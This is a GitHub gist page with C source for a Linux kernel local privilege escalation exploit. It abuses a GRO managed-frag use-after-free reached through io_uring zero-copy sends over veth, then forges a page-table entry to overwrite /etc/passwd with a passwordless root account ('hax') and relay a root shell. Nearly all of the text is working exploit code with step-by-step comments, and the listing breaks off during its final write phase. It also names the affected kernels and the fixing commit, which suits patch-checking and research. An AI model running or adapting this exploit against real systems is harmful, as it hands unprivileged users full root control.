-
-
Save birdie-github/214a7b9117db14cb1e2faa8018de4732 to your computer and use it in GitHub Desktop.
LPE via GRO managed-frag UAF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * gro_frag.c — LPE via GRO managed-frag UAF (io_uring SEND_ZC + veth) | |
| * | |
| * The bug: skb_gro_receive() copies frag descriptors from a ZC skb | |
| * (SKBFL_MANAGED_FRAG_REFS → no per-frag page refs) into a non-ZC | |
| * GRO accumulator. When the accumulator is freed, skb_release_data() | |
| * calls put_page() on each frag — including the stolen ones that never | |
| * had get_page() called. This gives us one extra put_page per merged | |
| * ZC frag: a refcount underflow. | |
| * | |
| * Race window: between ZC notification (page refs from GUP released) | |
| * and GRO accumulator destruction (put_page fires), we clean up the | |
| * page's PTE and page-cache references. The vmsplice pipe reference | |
| * is the one "stolen" by the underflow — leaving a stale read handle | |
| * to a freed physical page. | |
| * | |
| * Exploitation: | |
| * 1. AF_PACKET PACKET_TX_RING (UNMOVABLE pages) + vmsplice + io_uring pin | |
| * 2. Fixed-buf SEND_ZC → GRO merges managed frags into non-ZC seed | |
| * 3. munmap + unpin + close AF_PACKET → pages freed to UNMOVABLE PCP | |
| * 4. pipe_B writes 8 bytes → grabs freed page from UNMOVABLE PCP (CAN_MERGE) | |
| * 5. pipe_A read → put_page frees pipe_B's page back to UNMOVABLE PCP | |
| * 6. mmap /etc/passwd at 2MB-aligned slot → touch → PTE page allocated | |
| * from UNMOVABLE PCP → IS pipe_B's freed page (dirty pagetable) | |
| * 7. tee pipe_B → read PTE[0] → extract /etc/passwd PFN | |
| * 8. CAN_MERGE write to pipe_B → crafted PTE[1] (RW, same PFN) | |
| * 9. Write through crafted PTE → hardware walk bypasses VMA check | |
| * 10. su hax → root | |
| * | |
| * Affected: Linux 6.0+ (unprivileged, requires io_uring) | |
| * Fixed by: 4db79a322db8 ("net: gro: don't merge zcopy skbs") | |
| * | |
| * Tested: Ubuntu 24.04 | |
| * Compile: gcc -Wall -O2 -o gro_lpe gro_lpe.c -static -lutil | |
| */ | |
| #define _GNU_SOURCE | |
| #include <arpa/inet.h> | |
| #include <errno.h> | |
| #include <fcntl.h> | |
| #include <linux/io_uring.h> | |
| #include <poll.h> | |
| #include <pty.h> | |
| #include <sched.h> | |
| #include <signal.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <sys/socket.h> | |
| #include <sys/syscall.h> | |
| #include <sys/uio.h> | |
| #include <sys/wait.h> | |
| #include <termios.h> | |
| #include <linux/if_packet.h> | |
| #include <unistd.h> | |
| #include <netinet/tcp.h> | |
| #ifndef IORING_OP_SEND | |
| #define IORING_OP_SEND 26 | |
| #endif | |
| #ifndef IORING_OP_SEND_ZC | |
| #define IORING_OP_SEND_ZC 47 | |
| #endif | |
| #ifndef IORING_RECVSEND_FIXED_BUF | |
| #define IORING_RECVSEND_FIXED_BUF (1U << 2) | |
| #endif | |
| #ifndef IORING_CQE_F_NOTIF | |
| #define IORING_CQE_F_NOTIF (1U << 3) | |
| #endif | |
| #define PAGE_SIZE 4096 | |
| #define RING_ENTRIES 64 | |
| #define NUM_PAGES 1 | |
| #define BUF_SIZE (NUM_PAGES * PAGE_SIZE) | |
| #define VETH_MTU 4148 | |
| #define VETH_IP_A "10.0.0.1" | |
| #define VETH_IP_B "10.0.0.2" | |
| #define LISTEN_PORT 9999 | |
| #define PASSWD_PATH "/etc/passwd" | |
| #define BACKUP_PATH "/tmp/.gro_passwd_bak" | |
| #define PAYLOAD "hax::0:0::/root:/bin/sh\n" | |
| #define PAYLOAD_LEN 24 | |
| #define PCP_DRAIN_PIPES 256 | |
| #define PMD_SIZE (512 * PAGE_SIZE) | |
| struct uring { | |
| int fd; | |
| void *sq_ring, *cq_ring, *sqes_mem; | |
| uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array; | |
| uint32_t *cq_head, *cq_tail, *cq_mask; | |
| struct io_uring_cqe *cqes; | |
| struct io_uring_sqe *sqes; | |
| }; | |
| static int uring_setup(struct uring *r) | |
| { | |
| struct io_uring_params p = {0}; | |
| r->fd = syscall(__NR_io_uring_setup, RING_ENTRIES, &p); | |
| if (r->fd < 0) return -1; | |
| size_t sq_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t); | |
| size_t cq_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe); | |
| size_t sqe_sz = p.sq_entries * sizeof(struct io_uring_sqe); | |
| r->sq_ring = mmap(0, sq_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, | |
| r->fd, IORING_OFF_SQ_RING); | |
| r->cq_ring = mmap(0, cq_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, | |
| r->fd, IORING_OFF_CQ_RING); | |
| r->sqes_mem = mmap(0, sqe_sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, | |
| r->fd, IORING_OFF_SQES); | |
| if (r->sq_ring == MAP_FAILED || r->cq_ring == MAP_FAILED || | |
| r->sqes_mem == MAP_FAILED) | |
| return -1; | |
| r->sq_head = r->sq_ring + p.sq_off.head; | |
| r->sq_tail = r->sq_ring + p.sq_off.tail; | |
| r->sq_mask = r->sq_ring + p.sq_off.ring_mask; | |
| r->sq_array = r->sq_ring + p.sq_off.array; | |
| r->cq_head = r->cq_ring + p.cq_off.head; | |
| r->cq_tail = r->cq_ring + p.cq_off.tail; | |
| r->cq_mask = r->cq_ring + p.cq_off.ring_mask; | |
| r->cqes = r->cq_ring + p.cq_off.cqes; | |
| r->sqes = r->sqes_mem; | |
| return 0; | |
| } | |
| static struct io_uring_sqe *uring_get_sqe(struct uring *r) | |
| { | |
| uint32_t tail = *r->sq_tail; | |
| uint32_t mask = *r->sq_mask; | |
| struct io_uring_sqe *sqe = &r->sqes[tail & mask]; | |
| r->sq_array[tail & mask] = tail & mask; | |
| memset(sqe, 0, sizeof(*sqe)); | |
| *r->sq_tail = tail + 1; | |
| return sqe; | |
| } | |
| static int uring_submit(struct uring *r, int wait_nr) | |
| { | |
| return syscall(__NR_io_uring_enter, r->fd, | |
| *r->sq_tail - *r->sq_head, wait_nr, | |
| wait_nr ? IORING_ENTER_GETEVENTS : 0, NULL, 0); | |
| } | |
| static int uring_peek_cqe(struct uring *r, struct io_uring_cqe *out) | |
| { | |
| uint32_t head = *r->cq_head; | |
| __sync_synchronize(); | |
| if (head != *r->cq_tail) { | |
| *out = r->cqes[head & *r->cq_mask]; | |
| __sync_synchronize(); | |
| *r->cq_head = head + 1; | |
| return 0; | |
| } | |
| return -1; | |
| } | |
| static int uring_wait_cqes_timeout(struct uring *r, int ms) | |
| { | |
| struct pollfd pfd = { .fd = r->fd, .events = POLLIN }; | |
| return poll(&pfd, 1, ms); | |
| } | |
| static int uring_drain_cqes(struct uring *r, int *send_ok, int *notifs, int timeout_ms) | |
| { | |
| *send_ok = 0; | |
| *notifs = 0; | |
| int total = 0; | |
| for (int round = 0; round < 50; round++) { | |
| struct io_uring_cqe cqe; | |
| while (uring_peek_cqe(r, &cqe) == 0) { | |
| total++; | |
| if (cqe.flags & IORING_CQE_F_NOTIF) | |
| (*notifs)++; | |
| else if (cqe.res >= 0) | |
| (*send_ok)++; | |
| else | |
| fprintf(stderr, " CQE error: res=%d (%s)\n", | |
| cqe.res, strerror(-cqe.res)); | |
| } | |
| if (uring_wait_cqes_timeout(r, timeout_ms / 50 + 1) <= 0) | |
| break; | |
| } | |
| return total; | |
| } | |
| static int write_file(const char *path, const char *data) | |
| { | |
| int fd = open(path, O_WRONLY); | |
| if (fd < 0) return -1; | |
| int len = strlen(data); | |
| int ret = (write(fd, data, len) == len) ? 0 : -1; | |
| close(fd); | |
| return ret; | |
| } | |
| /* ---- receiver child: separate netns with veth1 (TCP) ---- */ | |
| static void child_receiver(int sync_rd, int sync_wr) | |
| { | |
| char buf; | |
| if (unshare(CLONE_NEWNET) < 0) _exit(1); | |
| (void)!write(sync_wr, "R", 1); | |
| if (read(sync_rd, &buf, 1) != 1) _exit(1); | |
| (void)!system("ip link set lo up"); | |
| char mtu_cmd[64]; | |
| snprintf(mtu_cmd, sizeof(mtu_cmd), "ip link set veth1 mtu %d", VETH_MTU); | |
| (void)!system(mtu_cmd); | |
| (void)!system("ip addr add " VETH_IP_B "/24 dev veth1"); | |
| (void)!system("ip link set veth1 up"); | |
| (void)!system("ethtool -K veth1 gro on 2>/dev/null"); | |
| int ls = socket(AF_INET, SOCK_STREAM, 0); | |
| int one = 1; | |
| setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); | |
| int rcvbuf = 4 * 1024 * 1024; | |
| setsockopt(ls, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf)); | |
| struct sockaddr_in addr = { | |
| .sin_family = AF_INET, | |
| .sin_port = htons(LISTEN_PORT), | |
| }; | |
| inet_pton(AF_INET, VETH_IP_B, &addr.sin_addr); | |
| bind(ls, (void *)&addr, sizeof(addr)); | |
| listen(ls, 1); | |
| (void)!write(sync_wr, "L", 1); | |
| int s = accept(ls, NULL, NULL); | |
| close(ls); | |
| if (s < 0) _exit(1); | |
| (void)!write(sync_wr, "A", 1); | |
| /* Wait for parent to signal us to drain */ | |
| if (read(sync_rd, &buf, 1) != 1) { close(s); _exit(1); } | |
| char rbuf[65536]; | |
| struct timeval tv = {.tv_sec = 2}; | |
| setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); | |
| while (recv(s, rbuf, sizeof(rbuf), 0) > 0) | |
| ; | |
| close(s); | |
| (void)!write(sync_wr, "D", 1); | |
| _exit(0); | |
| } | |
| /* ---- backup / restore ---- */ | |
| static int do_backup(void) | |
| { | |
| int src = open(PASSWD_PATH, O_RDONLY); | |
| if (src < 0) { perror("open passwd"); return -1; } | |
| int dst = open(BACKUP_PATH, O_WRONLY|O_CREAT|O_TRUNC, 0600); | |
| if (dst < 0) { perror("create backup"); close(src); return -1; } | |
| char buf[4096]; | |
| ssize_t n; | |
| while ((n = read(src, buf, sizeof(buf))) > 0) | |
| (void)!write(dst, buf, n); | |
| close(src); | |
| close(dst); | |
| return 0; | |
| } | |
| static int do_restore(void) | |
| { | |
| int src = open(BACKUP_PATH, O_RDONLY); | |
| if (src < 0) return -1; | |
| int dst = open(PASSWD_PATH, O_WRONLY|O_TRUNC); | |
| if (dst < 0) { close(src); return -1; } | |
| char buf[4096]; | |
| ssize_t n; | |
| while ((n = read(src, buf, sizeof(buf))) > 0) | |
| (void)!write(dst, buf, n); | |
| close(src); | |
| close(dst); | |
| unlink(BACKUP_PATH); | |
| return 0; | |
| } | |
| /* ---- pty relay for interactive root shell ---- */ | |
| static void relay_pty(int master) | |
| { | |
| struct termios old_tio, raw_tio; | |
| tcgetattr(STDIN_FILENO, &old_tio); | |
| raw_tio = old_tio; | |
| cfmakeraw(&raw_tio); | |
| tcsetattr(STDIN_FILENO, TCSANOW, &raw_tio); | |
| fd_set fds; | |
| char buf[4096]; | |
| for (;;) { | |
| FD_ZERO(&fds); | |
| FD_SET(STDIN_FILENO, &fds); | |
| FD_SET(master, &fds); | |
| if (select(master + 1, &fds, NULL, NULL, NULL) < 0) break; | |
| if (FD_ISSET(master, &fds)) { | |
| ssize_t n = read(master, buf, sizeof(buf)); | |
| if (n <= 0) break; | |
| (void)!write(STDOUT_FILENO, buf, n); | |
| } | |
| if (FD_ISSET(STDIN_FILENO, &fds)) { | |
| ssize_t n = read(STDIN_FILENO, buf, sizeof(buf)); | |
| if (n <= 0) break; | |
| (void)!write(master, buf, n); | |
| } | |
| } | |
| tcsetattr(STDIN_FILENO, TCSANOW, &old_tio); | |
| } | |
| /* ---- trigger GRO UAF and corrupt page cache ---- */ | |
| static int do_corrupt(int done_wr, int wait_rd) | |
| { | |
| uid_t real_uid = getuid(); | |
| gid_t real_gid = getgid(); | |
| cpu_set_t cpus; | |
| CPU_ZERO(&cpus); | |
| CPU_SET(0, &cpus); | |
| sched_setaffinity(0, sizeof(cpus), &cpus); | |
| /* ---- enter user+net namespace ---- */ | |
| if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { | |
| fprintf(stderr, "[-] unshare: %s\n", strerror(errno)); | |
| return -1; | |
| } | |
| write_file("/proc/self/setgroups", "deny"); | |
| char mapbuf[64]; | |
| snprintf(mapbuf, sizeof(mapbuf), "0 %d 1", real_uid); | |
| write_file("/proc/self/uid_map", mapbuf); | |
| snprintf(mapbuf, sizeof(mapbuf), "0 %d 1", real_gid); | |
| write_file("/proc/self/gid_map", mapbuf); | |
| /* ---- veth pair ---- */ | |
| (void)!system("ip link add veth0 type veth peer name veth1"); | |
| int p2c[2], c2p[2]; | |
| (void)!pipe(p2c); | |
| (void)!pipe(c2p); | |
| pid_t child = fork(); | |
| if (child < 0) return -1; | |
| if (child == 0) { | |
| close(p2c[1]); close(c2p[0]); | |
| child_receiver(p2c[0], c2p[1]); | |
| _exit(0); | |
| } | |
| close(p2c[0]); close(c2p[1]); | |
| char sync; | |
| (void)!read(c2p[0], &sync, 1); | |
| char cmd[256]; | |
| snprintf(cmd, sizeof(cmd), "ip link set veth1 netns %d", child); | |
| (void)!system(cmd); | |
| (void)!system("ip link set lo up"); | |
| snprintf(cmd, sizeof(cmd), "ip link set veth0 mtu %d", VETH_MTU); | |
| (void)!system(cmd); | |
| (void)!system("ip addr add " VETH_IP_A "/24 dev veth0"); | |
| (void)!system("ip link set veth0 up"); | |
| (void)!system("ethtool -K veth0 tso off gso off gro off 2>/dev/null"); | |
| if (system("tc qdisc add dev veth0 root netem delay 50ms") != 0) | |
| fprintf(stderr, "[!] tc netem failed — packets won't be batched\n"); | |
| (void)!write(p2c[1], "G", 1); | |
| (void)!read(c2p[0], &sync, 1); | |
| fprintf(stderr, "[+] veth pair ready (MTU %d, netem 50ms, GRO on receiver)\n", VETH_MTU); | |
| /* ---- TCP connect (receiver is listening) ---- */ | |
| int client = socket(AF_INET, SOCK_STREAM, 0); | |
| int one_tcp = 1; | |
| setsockopt(client, SOL_SOCKET, SO_ZEROCOPY, &one_tcp, sizeof(one_tcp)); | |
| setsockopt(client, IPPROTO_TCP, TCP_NODELAY, &one_tcp, sizeof(one_tcp)); | |
| int sndbuf = 2 * 1024 * 1024; | |
| setsockopt(client, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf)); | |
| struct sockaddr_in saddr = { | |
| .sin_family = AF_INET, | |
| .sin_port = htons(LISTEN_PORT), | |
| }; | |
| inet_pton(AF_INET, VETH_IP_B, &saddr.sin_addr); | |
| if (connect(client, (void *)&saddr, sizeof(saddr)) < 0) { | |
| fprintf(stderr, "[-] TCP connect: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| /* Wait for child to accept */ | |
| (void)!read(c2p[0], &sync, 1); | |
| fprintf(stderr, "[+] TCP connection established\n"); | |
| /* ---- create AF_PACKET TX ring buffer (UNMOVABLE pages) ---- */ | |
| int pf = socket(AF_PACKET, SOCK_RAW, 0); | |
| if (pf < 0) { | |
| fprintf(stderr, "[-] AF_PACKET socket: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| struct tpacket_req treq = { | |
| .tp_block_size = PAGE_SIZE, | |
| .tp_block_nr = NUM_PAGES, | |
| .tp_frame_size = PAGE_SIZE, | |
| .tp_frame_nr = NUM_PAGES, | |
| }; | |
| if (setsockopt(pf, SOL_PACKET, PACKET_TX_RING, &treq, sizeof(treq)) < 0) { | |
| fprintf(stderr, "[-] PACKET_TX_RING: %s\n", strerror(errno)); | |
| close(pf); kill(child, SIGKILL); return -1; | |
| } | |
| void *zc_buf = mmap(NULL, BUF_SIZE, PROT_READ|PROT_WRITE, | |
| MAP_SHARED|MAP_POPULATE, pf, 0); | |
| if (zc_buf == MAP_FAILED) { | |
| fprintf(stderr, "[-] AF_PACKET mmap: %s\n", strerror(errno)); | |
| close(pf); kill(child, SIGKILL); return -1; | |
| } | |
| for (int i = 0; i < NUM_PAGES; i++) | |
| memset((char *)zc_buf + i * PAGE_SIZE, 'A' + i, PAGE_SIZE); | |
| fprintf(stderr, "[+] AF_PACKET TX ring at %p (%d UNMOVABLE pages)\n", zc_buf, NUM_PAGES); | |
| /* ---- vmsplice pages into pipe (stale read ref after free) ---- */ | |
| int leak_pipe[2]; | |
| if (pipe(leak_pipe) < 0) { | |
| fprintf(stderr, "[-] pipe: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| /* make pipe large enough */ | |
| fcntl(leak_pipe[0], F_SETPIPE_SZ, BUF_SIZE * 2); | |
| struct iovec splice_iov[NUM_PAGES]; | |
| for (int i = 0; i < NUM_PAGES; i++) { | |
| splice_iov[i].iov_base = (char *)zc_buf + i * PAGE_SIZE; | |
| splice_iov[i].iov_len = PAGE_SIZE; | |
| } | |
| ssize_t spliced = vmsplice(leak_pipe[1], splice_iov, NUM_PAGES, 0); | |
| if (spliced < 0) { | |
| fprintf(stderr, "[-] vmsplice: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| fprintf(stderr, "[+] vmsplice'd %zd bytes into pipe (stale ref)\n", spliced); | |
| /* ---- io_uring + register buffer (pins pages) ---- */ | |
| struct uring ring; | |
| if (uring_setup(&ring) < 0) { | |
| fprintf(stderr, "[-] io_uring_setup: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| struct iovec iov = { .iov_base = zc_buf, .iov_len = BUF_SIZE }; | |
| if (syscall(__NR_io_uring_register, ring.fd, | |
| IORING_REGISTER_BUFFERS, &iov, 1) < 0) { | |
| fprintf(stderr, "[-] REGISTER_BUFFERS: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| fprintf(stderr, "[+] registered %d-page buffer (pinned, +1024 refcount each)\n", NUM_PAGES); | |
| /* | |
| * Refcount per page: | |
| * AF_PACKET(1) + mmap_PTE(1) + pipe(1) + pin(1024) = 1027 | |
| * | |
| * After exploit: | |
| * GRO(-1) + munmap(-1) + unpin(-1024) + close_AF_PACKET(-1) = -1027 | |
| * Final: 0 → page freed, pipe_A has stale ref (UNMOVABLE PCP) | |
| */ | |
| /* ---- submit seed + ZC sends ---- */ | |
| static char seed_buf[PAGE_SIZE]; | |
| memset(seed_buf, 'S', PAGE_SIZE); | |
| fprintf(stderr, "[*] submitting seed + %d SEND_ZC...\n", NUM_PAGES); | |
| struct io_uring_sqe *sqe = uring_get_sqe(&ring); | |
| sqe->opcode = IORING_OP_SEND; | |
| sqe->fd = client; | |
| sqe->addr = (unsigned long)seed_buf; | |
| sqe->len = PAGE_SIZE; | |
| sqe->msg_flags = MSG_MORE; | |
| sqe->user_data = 99; | |
| for (int i = 0; i < NUM_PAGES; i++) { | |
| sqe = uring_get_sqe(&ring); | |
| sqe->opcode = IORING_OP_SEND_ZC; | |
| sqe->fd = client; | |
| sqe->addr = (unsigned long)zc_buf + i * PAGE_SIZE; | |
| sqe->len = PAGE_SIZE; | |
| sqe->ioprio = IORING_RECVSEND_FIXED_BUF; | |
| sqe->buf_index = 0; | |
| if (i < NUM_PAGES - 1) | |
| sqe->msg_flags = MSG_MORE; | |
| sqe->user_data = 100 + i; | |
| } | |
| int submitted = uring_submit(&ring, 0); | |
| if (submitted < 0) { | |
| fprintf(stderr, "[-] submit: %s\n", strerror(errno)); | |
| kill(child, SIGKILL); return -1; | |
| } | |
| fprintf(stderr, "[+] submitted %d SQEs (1 seed + %d ZC)\n", submitted, NUM_PAGES); | |
| /* | |
| * RST race: close socket with SO_LINGER(0) BEFORE netem releases clones. | |
| * TCP RST frees originals in retransmit queue, decrementing dataref on | |
| * each clone's shared_info. After that, skb_cloned(clone) returns FALSE | |
| * → veth's skb_unclone is a no-op → GRO sees MANAGED_FRAG_REFS frags | |
| * without proper page refs → extra put_page on free → refcount underflow. | |
| */ | |
| usleep(5000); | |
| struct linger ling = { .l_onoff = 1, .l_linger = 0 }; | |
| setsockopt(client, SOL_SOCKET, SO_LINGER, &ling, sizeof(ling)); | |
| close(client); | |
| fprintf(stderr, "[+] RST sent (SO_LINGER 0), originals freed\n"); | |
| /* Wait for netem (50ms) + GRO + TCP delivery + skb free */ | |
| usleep(300000); | |
| /* Signal receiver to finish, collect its exit */ | |
| (void)!write(p2c[1], "D", 1); | |
| usleep(200000); | |
| /* Drain CQEs */ | |
| int send_ok = 0, notifs = 0; | |
| uring_drain_cqes(&ring, &send_ok, ¬ifs, 500); | |
| fprintf(stderr, "[+] CQEs: %d sends, %d notifs\n", send_ok, notifs); | |
| kill(child, SIGTERM); | |
| waitpid(child, NULL, 0); | |
| /* ---- Phase 1: remove PTE mapping ---- */ | |
| fprintf(stderr, "[*] munmap AF_PACKET ring (remove PTE refs)...\n"); | |
| munmap(zc_buf, BUF_SIZE); | |
| fprintf(stderr, "[*] waiting for RCU grace period...\n"); | |
| usleep(500000); | |
| /* Drain UNMOVABLE PCP so our freed pages land on top */ | |
| fprintf(stderr, "[*] draining UNMOVABLE PCP via pipe allocations...\n"); | |
| int drain_pipes[PCP_DRAIN_PIPES][2]; | |
| int drain_count = 0; | |
| for (int i = 0; i < PCP_DRAIN_PIPES; i++) { | |
| if (pipe(drain_pipes[i]) < 0) break; | |
| char c = 'X'; | |
| if (write(drain_pipes[i][1], &c, 1) != 1) { | |
| close(drain_pipes[i][0]); close(drain_pipes[i][1]); | |
| break; | |
| } | |
| drain_count++; | |
| } | |
| fprintf(stderr, "[+] drained %d UNMOVABLE pages from PCP\n", drain_count); | |
| /* ---- Phase 2: unpin + close AF_PACKET → pages freed to UNMOVABLE PCP ---- */ | |
| fprintf(stderr, "[*] unregistering buffer (unpin)...\n"); | |
| syscall(__NR_io_uring_register, ring.fd, IORING_UNREGISTER_BUFFERS, NULL, 0); | |
| close(ring.fd); | |
| fprintf(stderr, "[*] closing AF_PACKET socket (last ref dropped → pages freed)...\n"); | |
| close(pf); | |
| fprintf(stderr, "[+] %d pages freed to UNMOVABLE PCP (pipe_A has stale refs)\n", NUM_PAGES); | |
| /* | |
| * ---- Phase 3: pipe_B CAN_MERGE — snatch freed UNMOVABLE page ---- | |
| * | |
| * pipe_write allocates from UNMOVABLE PCP (GFP_HIGHUSER, no __GFP_MOVABLE). | |
| * Our freed AF_PACKET pages are also UNMOVABLE → same PCP list → match. | |
| * Write 8 bytes (one PTE entry) so CAN_MERGE append lands at offset 8 = PTE[1]. | |
| */ | |
| int pipe_B[2]; | |
| if (pipe(pipe_B) < 0) { | |
| fprintf(stderr, "[-] pipe_B: %s\n", strerror(errno)); | |
| close(leak_pipe[0]); close(leak_pipe[1]); | |
| return -1; | |
| } | |
| uint64_t filler = 0xDEADBEEFDEADBEEFULL; | |
| ssize_t written = write(pipe_B[1], &filler, 8); | |
| if (written != 8) { | |
| fprintf(stderr, "[-] pipe_B filler write: %zd\n", written); | |
| close(leak_pipe[0]); close(leak_pipe[1]); | |
| close(pipe_B[0]); close(pipe_B[1]); | |
| return -1; | |
| } | |
| fprintf(stderr, "[+] pipe_B: wrote 8-byte filler (CAN_MERGE, snatched UNMOVABLE page)\n"); | |
| /* | |
| * ---- Phase 4: free pipe_B's page via pipe_A stale refs ---- | |
| * | |
| * pipe_A read → put_page on the single stale vmsplice ref. | |
| * The page (grabbed by pipe_B): refcount 1 → 0 → freed back to UNMOVABLE PCP. | |
| * pipe_B still has stale CAN_MERGE buffer pointing to the freed page. | |
| */ | |
| fprintf(stderr, "[*] reading pipe_A (stale refs) → frees pipe_B's page...\n"); | |
| char pipe_data[NUM_PAGES * PAGE_SIZE]; | |
| ssize_t total_read = 0; | |
| while (total_read < (ssize_t)sizeof(pipe_data)) { | |
| ssize_t n = read(leak_pipe[0], pipe_data + total_read, | |
| sizeof(pipe_data) - total_read); | |
| if (n <= 0) break; | |
| total_read += n; | |
| } | |
| close(leak_pipe[0]); | |
| close(leak_pipe[1]); | |
| fprintf(stderr, "[+] drained %zd bytes from pipe_A\n", total_read); | |
| /* | |
| * ---- Phase 5: allocate PTE page from UNMOVABLE PCP ---- | |
| * | |
| * Map /etc/passwd (MAP_SHARED) at a 2MB-aligned slot 0. | |
| * Touch it → page fault → kernel allocates PTE page from UNMOVABLE PCP. | |
| * PTE page IS pipe_B's freed page. PTE[0] = PFN of /etc/passwd | flags. | |
| * Slot 1 (base+PAGE_SIZE) has no VMA — we'll access it via crafted PTE. | |
| * Hardware PTE walk doesn't check VMAs; only page fault handler does. | |
| */ | |
| void *big = mmap(NULL, 4 * PMD_SIZE, PROT_NONE, | |
| MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); | |
| if (big == MAP_FAILED) { | |
| fprintf(stderr, "[-] reserve mmap: %s\n", strerror(errno)); | |
| close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| uintptr_t base_addr = ((uintptr_t)big + PMD_SIZE - 1) & ~(PMD_SIZE - 1); | |
| munmap(big, 4 * PMD_SIZE); | |
| int passwd_fd = open(PASSWD_PATH, O_RDONLY); | |
| if (passwd_fd < 0) { | |
| fprintf(stderr, "[-] open %s: %s\n", PASSWD_PATH, strerror(errno)); | |
| close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| void *slot0 = mmap((void *)base_addr, PAGE_SIZE, PROT_READ, | |
| MAP_SHARED | MAP_FIXED, passwd_fd, 0); | |
| if (slot0 == MAP_FAILED) { | |
| fprintf(stderr, "[-] mmap /etc/passwd: %s\n", strerror(errno)); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| fprintf(stderr, "[+] /etc/passwd mapped at %p (2MB-aligned slot 0)\n", slot0); | |
| volatile char touch = *(volatile char *)slot0; | |
| (void)touch; | |
| fprintf(stderr, "[+] slot 0 touched — PTE page allocated from UNMOVABLE PCP\n"); | |
| /* | |
| * ---- Phase 6: read PTE[0] via tee, write crafted PTE[1] ---- | |
| * | |
| * tee() duplicates pipe_B's buffer to a helper pipe without consuming it. | |
| * Read helper → get PTE[0] (current physical page content, i.e. the PTE entry | |
| * the kernel wrote for /etc/passwd). Extract PFN. | |
| * Then CAN_MERGE write to pipe_B at offset 8 → overwrites PTE[1] with | |
| * crafted entry: same PFN but Present+RW+User+Accessed+Dirty. | |
| */ | |
| int helper[2]; | |
| if (pipe(helper) < 0) { | |
| fprintf(stderr, "[-] helper pipe: %s\n", strerror(errno)); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| ssize_t teed = tee(pipe_B[0], helper[1], 8, 0); | |
| if (teed != 8) { | |
| fprintf(stderr, "[-] tee: %zd (%s)\n", teed, strerror(errno)); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| close(helper[0]); close(helper[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| uint64_t pte0 = 0; | |
| if (read(helper[0], &pte0, 8) != 8) { | |
| fprintf(stderr, "[-] read PTE[0] from helper: %s\n", strerror(errno)); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| close(helper[0]); close(helper[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| close(helper[0]); close(helper[1]); | |
| fprintf(stderr, "[+] PTE[0] = 0x%016lx\n", (unsigned long)pte0); | |
| if (!(pte0 & 1)) { | |
| fprintf(stderr, "[-] PTE[0] not present — PTE page mismatch\n"); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| uint64_t pfn = (pte0 & 0x000FFFFFFFFFF000ULL) >> 12; | |
| fprintf(stderr, "[+] /etc/passwd PFN = 0x%lx (phys 0x%lx)\n", | |
| (unsigned long)pfn, (unsigned long)(pfn << 12)); | |
| /* Craft PTE[1]: same PFN, Present+RW+User+Accessed+Dirty */ | |
| uint64_t crafted_pte = (pfn << 12) | 0x067; | |
| fprintf(stderr, "[+] crafted PTE[1] = 0x%016lx\n", (unsigned long)crafted_pte); | |
| written = write(pipe_B[1], &crafted_pte, 8); | |
| if (written != 8) { | |
| fprintf(stderr, "[-] pipe_B CAN_MERGE write: %zd\n", written); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| fprintf(stderr, "[+] PTE[1] written via CAN_MERGE — dirty pagetable armed\n"); | |
| /* Close drain pipes now that PTE is armed */ | |
| for (int i = 0; i < drain_count; i++) { | |
| close(drain_pipes[i][0]); | |
| close(drain_pipes[i][1]); | |
| } | |
| /* | |
| * ---- Phase 7: write payload through crafted PTE ---- | |
| * | |
| * base+PAGE_SIZE has no VMA but PTE[1] is Present+RW+User. | |
| * Hardware PTE walk succeeds → TLB loaded → write goes to /etc/passwd | |
| * physical page WITHOUT page fault → VMA check never happens. | |
| */ | |
| void *rw_page = (void *)(base_addr + PAGE_SIZE); | |
| /* Read current /etc/passwd content for payload construction */ | |
| char real_passwd[PAGE_SIZE]; | |
| memset(real_passwd, 0, PAGE_SIZE); | |
